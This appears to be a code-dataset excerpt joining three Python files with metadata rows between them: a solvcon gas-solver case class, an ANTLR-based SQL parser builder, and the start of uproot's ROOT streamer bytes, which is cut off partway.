# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# - Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
The control interface.
"""
import solvcon as sc
from . import solver as gassolver
class GasCase(sc.MeshCase):
"""
Temporal loop for the gas-dynamic solver.
"""
defdict = {
'solver.solvertype': gassolver.GasSolver,
'solver.domaintype': sc.Domain,
# Do no touch the following c-tau parameters.
'solver.alpha': 1,
'solver.sigma0': 3.0,
'solver.taylor': 1.0,
'solver.cnbfac': 1.0,
'solver.sftfac': 1.0,
'solver.taumin': None,
'solver.tauscale': None,
# End of c-taw parameters.
'io.rootdir': sc.env.projdir, # Different default to MeshCase.
}
def make_solver_keywords(self):
kw = super(GasCase, self).make_solver_keywords()
# time.
neq = self.blk.ndim + 2
kw['neq'] = self.execution.neq = neq
kw['time'] = self.execution.time
kw['time_increment'] = self.execution.time_increment
# c-tau scheme parameters.
kw['alpha'] = int(self.solver.alpha)
for key in ('sigma0', 'taylor', 'cnbfac', 'sftfac',
'taumin', 'tauscale',):
val = self.solver.get(key)
if val != None: kw[key] = float(val)
return kw
# vim: set ff=unix fenc=utf8 ft=python ai et sw=4 ts=4 tw=79:
| 37.545455
| 79
| 0.682809
|
361fe3a95aef2fc417c0d772f200082abbd7f713
| 3,095
|
py
|
Python
|
src/sqlparser/internalparser.py
|
pysparkling/python-sql-parser
|
b728995ce66e1feba1c0b1b8310edce8f3fa9d83
|
[
"Apache-2.0"
] | 2
|
2021-07-02T13:06:36.000Z
|
2021-07-22T12:19:53.000Z
|
src/sqlparser/internalparser.py
|
pysparkling/python-sql-parser
|
b728995ce66e1feba1c0b1b8310edce8f3fa9d83
|
[
"Apache-2.0"
] | null | null | null |
src/sqlparser/internalparser.py
|
pysparkling/python-sql-parser
|
b728995ce66e1feba1c0b1b8310edce8f3fa9d83
|
[
"Apache-2.0"
] | 1
|
2021-07-02T13:06:40.000Z
|
2021-07-02T13:06:40.000Z
|
import antlr4
from antlr4 import RecognitionException
from antlr4.error.ErrorListener import ErrorListener
from antlr4.error.ErrorStrategy import BailErrorStrategy
from antlr4.error.Errors import ParseCancellationException
from sqlparser.generated.SqlBaseLexer import SqlBaseLexer
from sqlparser.generated.SqlBaseParser import SqlBaseParser
class RemoveIdentifierBackticks(antlr4.ParseTreeListener):
@staticmethod
def exitQuotedIdentifier(ctx): # pylint: disable=invalid-name,unused-argument
def identity(token):
return token
return identity
@staticmethod
def enterNonReserved(ctx): # pylint: disable=invalid-name,unused-argument
def add_backtick(token):
return "`{0}`".format(token)
return add_backtick
class ParseErrorListener(ErrorListener):
def syntaxError(
self, recognizer, offendingSymbol, line, column, msg, e
): # pylint: disable=invalid-name,no-self-use,too-many-arguments
raise SqlSyntaxError("Parse error", msg)
class UpperCaseCharStream:
"""
Make SQL token detection case insensitive and allow identifier without
backticks to be seen as e.g. column names
"""
def __init__(self, wrapped):
self.wrapped = wrapped
def getText(self, interval, *args): # pylint: disable=invalid-name
if args or (self.size() > 0 and (interval.b - interval.a >= 0)):
return self.wrapped.getText(interval, *args)
return ""
def LA(self, i: int): # pylint: disable=invalid-name
token = self.wrapped.LA(i)
if token in (0, -1):
return token
return ord(chr(token).upper())
def __getattr__(self, item):
return getattr(self.wrapped, item)
class ExplicitBailErrorStrategy(BailErrorStrategy):
"""
Bail Error Strategy throws a ParseCancellationException,
This strategy simply throw a more explicit exception
"""
def recover(self, recognizer, e: RecognitionException):
try:
super(ExplicitBailErrorStrategy, self).recover(recognizer, e)
except ParseCancellationException:
raise SqlParsingError from e
class EarlyBailSqlLexer(SqlBaseLexer):
def recover(self, re: RecognitionException):
raise SqlLexicalError from re
def build_parser(stream, strict_mode=False, early_bail=True):
if not strict_mode:
stream = UpperCaseCharStream(stream)
if early_bail:
lexer = EarlyBailSqlLexer(stream)
else:
lexer = SqlBaseLexer(stream)
lexer.removeErrorListeners()
lexer.addErrorListener(ParseErrorListener())
token_stream = antlr4.CommonTokenStream(lexer)
parser = SqlBaseParser(token_stream)
parser.addParseListener(RemoveIdentifierBackticks())
parser.removeErrorListeners()
parser.addErrorListener(ParseErrorListener())
if early_bail:
parser._errHandler = ExplicitBailErrorStrategy()
return parser
class SqlParsingError(Exception):
pass
class SqlLexicalError(SqlParsingError):
pass
class SqlSyntaxError(SqlParsingError):
pass
| 29.47619
| 82
| 0.710501
|
ab93de25995d3ad9754eb1643106442f26abf1bb
| 115,560
|
py
|
Python
|
uproot/write/streamers.py
|
riga/uproot
|
78de42f849079c35fd05ae22033e56f02492b6c1
|
[
"BSD-3-Clause"
] | 1
|
2021-03-18T23:33:35.000Z
|
2021-03-18T23:33:35.000Z
|
uproot/write/streamers.py
|
riga/uproot
|
78de42f849079c35fd05ae22033e56f02492b6c1
|
[
"BSD-3-Clause"
] | 17
|
2020-01-28T22:33:27.000Z
|
2021-06-10T21:05:49.000Z
|
sparse/repos/chnzhangrui/SgTopWorkshop/binder/uproot/write/streamers.py
|
yuvipanda/mybinder.org-analytics
|
7b654e3e21dea790505c626d688aa15640ea5808
|
[
"BSD-3-Clause"
] | 1
|
2021-07-17T12:55:22.000Z
|
2021-07-17T12:55:22.000Z
|
#!/usr/bin/env python
# Copyright (c) 2017, DIANA-HEP
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# just TObjString (for debugging)
# streamers = b'@\x00\x01n\x00\x05\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01@\x00\x01X\xff\xff\xff\xffTStreamerInfo\x00@\x00\x01B\x00\t@\x00\x00\x18\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\nTObjString\x00\x9c\x8eH\x00\x00\x00\x00\x01@\x00\x01\x18\xff\xff\xff\xffTObjArray\x00@\x00\x01\x06\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00u\xff\xff\xff\xffTStreamerBase\x00@\x00\x00_\x00\x03@\x00\x00U\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TObject\x11Basic ROOT object\x00\x00\x00B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x1b\xc0-\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00t\xff\xff\xff\xffTStreamerString\x00@\x00\x00\\\x00\x02@\x00\x00V\x00\x04@\x00\x00$\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fString\x0fwrapped TString\x00\x00\x00A\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TString\x00'
# all useful streamers (histograms, etc.)
streamers = b'@\x00\xa0a\x00\x05\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00C@\x00\x01X\xff\xff\xff\xffTStreamerInfo\x00@\x00\x01B\x00\t@\x00\x00\x18\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\nTObjString\x00\x9c\x8eH\x00\x00\x00\x00\x01@\x00\x01\x18\xff\xff\xff\xffTObjArray\x00@\x00\x01\x06\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00u\xff\xff\xff\xffTStreamerBase\x00@\x00\x00_\x00\x03@\x00\x00U\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TObject\x11Basic ROOT object\x00\x00\x00B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x1b\xc0-\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00t\xff\xff\xff\xffTStreamerString\x00@\x00\x00\\\x00\x02@\x00\x00V\x00\x04@\x00\x00$\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fString\x0fwrapped TString\x00\x00\x00A\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TString\x00@\x00\x01H\x80\x00\x00[@\x00\x01@\x00\t@\x00\x00\x15\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x07TObject\x00\x90\x1b\xc0-\x00\x00\x00\x01@\x00\x01\x19\x80\x00\x00\x9b@\x00\x01\x11\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00\x87\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00l\x00\x02@\x00\x00f\x00\x04@\x00\x00/\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfUniqueID\x18object unique identifier\x00\x00\x00\r\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0cunsigned int@\x00\x00m\x80\x00\x02\x08@\x00\x00e\x00\x02@\x00\x00_\x00\x04@\x00\x00(\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fBits\x15bit field status word\x00\x00\x00\x0f\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0cunsigned int\x00@\x00\x01\xb3\x80\x00\x00[@\x00\x01\xab\x00\t@\x00\x00\x1c\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x0eTLorentzVector\x00\xe3\xde\xc1\xa1\x00\x00\x00\x04@\x00\x01}\x80\x00\x00\x9b@\x00\x01u\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00@\x00\x00g\x80\x00\x00\xc6@\x00\x00_\x00\x03@\x00\x00U\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TObject\x11Basic ROOT object\x00\x00\x00B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x1b\xc0-\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00s\xff\xff\xff\xffTStreamerObject\x00@\x00\x00[\x00\x02@\x00\x00U\x00\x04@\x00\x00"\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x02fP\x123 vector component\x00\x00\x00=\x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08TVector3@\x00\x00z\x80\x00\x02\x08@\x00\x00r\x00\x02@\x00\x00l\x00\x04@\x00\x00;\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x02fE+time or energy of (x,y,z,t) or (px,py,pz,e)\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double\x00@\x00\x01\xb1\x80\x00\x00[@\x00\x01\xa9\x00\t@\x00\x00\x16\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x08TVector3\x00\xab\xb6\xbe\x1e\x00\x00\x00\x03@\x00\x01\x81\x80\x00\x00\x9b@\x00\x01y\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00@\x00\x00g\x80\x00\x00\xc6@\x00\x00_\x00\x03@\x00\x00U\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TObject\x11Basic ROOT object\x00\x00\x00B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x1b\xc0-\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00O\x80\x00\x02\x08@\x00\x00G\x00\x02@\x00\x00A\x00\x04@\x00\x00\x10\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x02fX\x00\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00O\x80\x00\x02\x08@\x00\x00G\x00\x02@\x00\x00A\x00\x04@\x00\x00\x10\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x02fY\x00\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00O\x80\x00\x02\x08@\x00\x00G\x00\x02@\x00\x00A\x00\x04@\x00\x00\x10\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x02fZ\x00\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double\x00@\x00\x01v\x80\x00\x00[@\x00\x01n\x00\t@\x00\x00\x16\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x08TVector2\x00\x00\x89\xb7\xf4\x00\x00\x00\x03@\x00\x01F\x80\x00\x00\x9b@\x00\x01>\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00@\x00\x00g\x80\x00\x00\xc6@\x00\x00_\x00\x03@\x00\x00U\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TObject\x11Basic ROOT object\x00\x00\x00B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x1b\xc0-\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00g\x80\x00\x02\x08@\x00\x00_\x00\x02@\x00\x00Y\x00\x04@\x00\x00(\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x02fX\x18components of the vector\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00O\x80\x00\x02\x08@\x00\x00G\x00\x02@\x00\x00A\x00\x04@\x00\x00\x10\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x02fY\x00\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double\x00@\x00\x04\r\x80\x00\x00[@\x00\x04\x05\x00\t@\x00\x00\x16\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x08TProfile\x00K\xed\xeeT\x00\x00\x00\x06@\x00\x03\xdd\x80\x00\x00\x9b@\x00\x03\xd5\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00@\x00\x00|\x80\x00\x00\xc6@\x00\x00t\x00\x03@\x00\x00j\x00\x04@\x00\x00;\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x04TH1D)1-Dim histograms (one double per channel)\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf9\xb1V\x9f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00\x85\xff\xff\xff\xffTStreamerObjectAny\x00@\x00\x00j\x00\x02@\x00\x00d\x00\x04@\x00\x002\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfBinEntries\x19number of entries per bin\x00\x00\x00>\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TArrayD@\x00\x00s\x80\x00\x02\x08@\x00\x00k\x00\x02@\x00\x00e\x00\x04@\x00\x000\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfErrorMode\x18Option to compute errors\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\nEErrorType@\x00\x00k\x80\x00\x02\x08@\x00\x00c\x00\x02@\x00\x00]\x00\x04@\x00\x00,\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fYmin\x19Lower limit in Y (if set)\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00k\x80\x00\x02\x08@\x00\x00c\x00\x02@\x00\x00]\x00\x04@\x00\x00,\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fYmax\x19Upper limit in Y (if set)\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00i\x80\x00\x02\x08@\x00\x00a\x00\x02@\x00\x00[\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fTsumwy\x15Total Sum of weight*Y\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00l\x80\x00\x02\x08@\x00\x00d\x00\x02@\x00\x00^\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fTsumwy2\x17Total Sum of weight*Y*Y\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00\x81\x80\x00\x08\xbf@\x00\x00y\x00\x02@\x00\x00s\x00\x04@\x00\x00A\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfBinSumw2*Array of sum of squares of weights per bin\x00\x00\x00>\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TArrayD\x00@\x00\x01#\x80\x00\x00[@\x00\x01\x1b\x00\t@\x00\x00\x12\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x04TH1D\x00\xf9\xb1V\x9f\x00\x00\x00\x02@\x00\x00\xf7\x80\x00\x00\x9b@\x00\x00\xef\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00l\x80\x00\x00\xc6@\x00\x00d\x00\x03@\x00\x00Z\x00\x04@\x00\x00+\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x03TH1\x1a1-Dim histogram base class\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c7@\xc4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x08@\x00\x00f\x80\x00\x00\xc6@\x00\x00^\x00\x03@\x00\x00T\x00\x04@\x00\x00%\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TArrayD\x10Array of doubles\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00q9\xef4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01\x00@\x00\x0cl\x80\x00\x00[@\x00\x0cd\x00\t@\x00\x00\x11\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x03TH1\x00\x1c7@\xc4\x00\x00\x00\x08@\x00\x0cA\x80\x00\x00\x9b@\x00\x0c9\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00@\x00\x00\x7f\x80\x00\x00\xc6@\x00\x00w\x00\x03@\x00\x00m\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06TNamed*The basis for a named object (name, title)\x00\x00\x00C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdf\xb7J<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00f\x80\x00\x00\xc6@\x00\x00^\x00\x03@\x00\x00T\x00\x04@\x00\x00%\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08TAttLine\x0fLine attributes\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x94\x07EI\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00k\x80\x00\x00\xc6@\x00\x00c\x00\x03@\x00\x00Y\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08TAttFill\x14Fill area attributes\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd9*\x92\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00j\x80\x00\x00\xc6@\x00\x00b\x00\x03@\x00\x00X\x00\x04@\x00\x00)\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nTAttMarker\x11Marker attributes\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00)\x1d\x8b\xec\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00|\x80\x00\x02\x08@\x00\x00t\x00\x02@\x00\x00n\x00\x04@\x00\x00@\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fNcells+number of bins(1D), cells (2D) +U/Overflows\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00c\x80\x00\x03\xc7@\x00\x00[\x00\x02@\x00\x00U\x00\x04@\x00\x00%\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fXaxis\x11X axis descriptor\x00\x00\x00=\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05TAxis@\x00\x00c\x80\x00\x03\xc7@\x00\x00[\x00\x02@\x00\x00U\x00\x04@\x00\x00%\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fYaxis\x11Y axis descriptor\x00\x00\x00=\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05TAxis@\x00\x00c\x80\x00\x03\xc7@\x00\x00[\x00\x02@\x00\x00U\x00\x04@\x00\x00%\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fZaxis\x11Z axis descriptor\x00\x00\x00=\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05TAxis@\x00\x00{\x80\x00\x02\x08@\x00\x00s\x00\x02@\x00\x00m\x00\x04@\x00\x00=\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfBarOffset%(1000*offset) for bar charts or legos\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short@\x00\x00y\x80\x00\x02\x08@\x00\x00q\x00\x02@\x00\x00k\x00\x04@\x00\x00;\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfBarWidth$(1000*width) for bar charts or legos\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short@\x00\x00f\x80\x00\x02\x08@\x00\x00^\x00\x02@\x00\x00X\x00\x04@\x00\x00\'\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fEntries\x11Number of entries\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00g\x80\x00\x02\x08@\x00\x00_\x00\x02@\x00\x00Y\x00\x04@\x00\x00(\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fTsumw\x14Total Sum of weights\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00s\x80\x00\x02\x08@\x00\x00k\x00\x02@\x00\x00e\x00\x04@\x00\x004\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fTsumw2\x1fTotal Sum of squares of 